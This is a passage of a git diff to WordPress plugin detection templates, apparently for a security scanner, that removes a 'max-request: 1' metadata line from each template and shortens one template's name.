+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..ba558305a4 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -1,13 +1,12 @@
 id: wordpress-formidable
 
 info:
-  name: Formidable Forms – Contact Form, Survey, Quiz, Calculator & Custom Form Builder Detection
+  name: Formidable Forms – Contact Form, Survey, Quiz & Calculator Form Builder Detection
   author: ricardomaia
   severity: info
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 9c6e3e6d2e..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
